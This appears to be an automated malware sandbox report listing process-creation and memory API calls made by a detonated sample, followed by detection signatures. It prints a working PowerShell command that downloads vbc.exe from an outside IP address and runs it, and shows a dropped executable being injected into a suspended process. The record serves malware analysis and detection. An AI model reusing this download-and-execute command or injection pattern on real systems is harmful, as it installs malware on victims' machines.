CreateProcessInternalW Aug. 31, 2021, 10:50 a.m.	thread_identifier: 972 thread_handle: 0x000000000000039c process_identifier: 2864 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://193.169.255.212/pnb/vbc.exe', '%AppData%\\vbc.exe') & powershell Start-Process -FilePath '%AppData%\\vbc.exe' & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003a4	1	1
CreateProcessInternalW Aug. 31, 2021, 10:50 a.m.	thread_identifier: 2176 thread_handle: 0x0000000000000060 process_identifier: 2156 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell (New-Object System.Net.WebClient).DownloadFile('http://193.169.255.212/pnb/vbc.exe', 'C:\Users\test22\AppData\Roaming\\vbc.exe') filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW Aug. 31, 2021, 10:50 a.m.	thread_identifier: 2840 thread_handle: 0x0000000000000064 process_identifier: 784 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell Start-Process -FilePath 'C:\Users\test22\AppData\Roaming\\vbc.exe' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000060	1	1
NtResumeThread Aug. 31, 2021, 10:50 a.m.	thread_handle: 0x0000000000000284 suspend_count: 1 process_identifier: 2156	1	0
NtResumeThread Aug. 31, 2021, 10:50 a.m.	thread_handle: 0x00000000000002d8 suspend_count: 1 process_identifier: 2156	1	0
NtResumeThread Aug. 31, 2021, 10:50 a.m.	thread_handle: 0x0000000000000368 suspend_count: 1 process_identifier: 2156	1	0
NtResumeThread Aug. 31, 2021, 10:50 a.m.	thread_handle: 0x00000000000004d0 suspend_count: 1 process_identifier: 2156	1	0
NtResumeThread Aug. 31, 2021, 10:50 a.m.	thread_handle: 0x0000000000000524 suspend_count: 1 process_identifier: 2156	1	0
NtResumeThread Aug. 31, 2021, 11:10 a.m.	thread_handle: 0x0000000000000298 suspend_count: 1 process_identifier: 784	1	0
NtResumeThread Aug. 31, 2021, 11:10 a.m.	thread_handle: 0x00000000000002f0 suspend_count: 1 process_identifier: 784	1	0
NtResumeThread Aug. 31, 2021, 11:10 a.m.	thread_handle: 0x0000000000000380 suspend_count: 1 process_identifier: 784	1	0
NtResumeThread Aug. 31, 2021, 11:10 a.m.	thread_handle: 0x000000000000039c suspend_count: 1 process_identifier: 784	1	0
CreateProcessInternalW Aug. 31, 2021, 11:11 a.m.	thread_identifier: 1960 thread_handle: 0x00000000000004c8 process_identifier: 2024 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\vbc.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\vbc.exe" filepath_r: C:\Users\test22\AppData\Roaming\vbc.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000004d0	1	1
NtResumeThread Aug. 31, 2021, 11:11 a.m.	thread_handle: 0x00000000000004f4 suspend_count: 1 process_identifier: 784	1	0
NtResumeThread Aug. 31, 2021, 11:11 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2024	1	0
NtResumeThread Aug. 31, 2021, 11:11 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2024	1	0
NtResumeThread Aug. 31, 2021, 11:11 a.m.	thread_handle: 0x00000188 suspend_count: 1 process_identifier: 2024	1	0
NtResumeThread Aug. 31, 2021, 11:11 a.m.	thread_handle: 0x00000348 suspend_count: 1 process_identifier: 2024	1	0
NtResumeThread Aug. 31, 2021, 11:11 a.m.	thread_handle: 0x000005fc suspend_count: 1 process_identifier: 2024	1	0
CreateProcessInternalW Aug. 31, 2021, 11:11 a.m.	thread_identifier: 200 thread_handle: 0x0000077c process_identifier: 2376 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\sys30\sys4h57g.exe track: 1 command_line: "C:\Users\test22\AppData\Local\sys30\sys4h57g.exe" filepath_r: C:\Users\test22\AppData\Local\sys30\sys4h57g.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000784	1	1
NtResumeThread Aug. 31, 2021, 11:11 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2376	1	0
NtResumeThread Aug. 31, 2021, 11:11 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2376	1	0
NtResumeThread Aug. 31, 2021, 11:11 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 2376	1	0
NtResumeThread Aug. 31, 2021, 11:11 a.m.	thread_handle: 0x0000034c suspend_count: 1 process_identifier: 2376	1	0
NtResumeThread Aug. 31, 2021, 11:11 a.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 2376	1	0
NtResumeThread Aug. 31, 2021, 11:12 a.m.	thread_handle: 0x0000020c suspend_count: 1 process_identifier: 2376	1	0
NtGetContextThread Aug. 31, 2021, 11:12 a.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Aug. 31, 2021, 11:12 a.m.	thread_handle: 0x000000e4	1	0
NtResumeThread Aug. 31, 2021, 11:12 a.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2376	1	0
NtResumeThread Aug. 31, 2021, 11:12 a.m.	thread_handle: 0x0000060c suspend_count: 1 process_identifier: 2376	1	0
NtResumeThread Aug. 31, 2021, 11:12 a.m.	thread_handle: 0x00000620 suspend_count: 1 process_identifier: 2376	1	0
CreateProcessInternalW Aug. 31, 2021, 11:12 a.m.	thread_identifier: 756 thread_handle: 0x00000624 process_identifier: 3056 current_directory: filepath: C:\Users\test22\AppData\Local\sys30\sys4h57g.exe track: 1 command_line: "C:\Users\test22\AppData\Local\sys30\sys4h57g.exe" filepath_r: C:\Users\test22\AppData\Local\sys30\sys4h57g.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000628	1	1
NtGetContextThread Aug. 31, 2021, 11:12 a.m.	thread_handle: 0x00000624	1	0
NtAllocateVirtualMemory Aug. 31, 2021, 11:12 a.m.	process_identifier: 3056 region_size: 229376 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000628	1	0
WriteProcessMemory Aug. 31, 2021, 11:12 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡'éTàÈ`ç @ 8çW ] H.textÇ È `.relocÊ@B.rsrc ] ^Ì@@ base_address: 0x00400000 process_identifier: 3056 process_handle: 0x00000628	1	1
WriteProcessMemory Aug. 31, 2021, 11:12 a.m.	buffer: base_address: 0x00402000 process_identifier: 3056 process_handle: 0x00000628	1	1
WriteProcessMemory Aug. 31, 2021, 11:12 a.m.	buffer: à7 base_address: 0x00420000 process_identifier: 3056 process_handle: 0x00000628	1	1
WriteProcessMemory Aug. 31, 2021, 11:12 a.m.	buffer: base_address: 0x00422000 process_identifier: 3056 process_handle: 0x00000628	1	1
WriteProcessMemory Aug. 31, 2021, 11:12 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3056 process_handle: 0x00000628	1	1

Powershell Downloader DFSP detected (1 event)

The process powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Roaming\vbc.exe

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All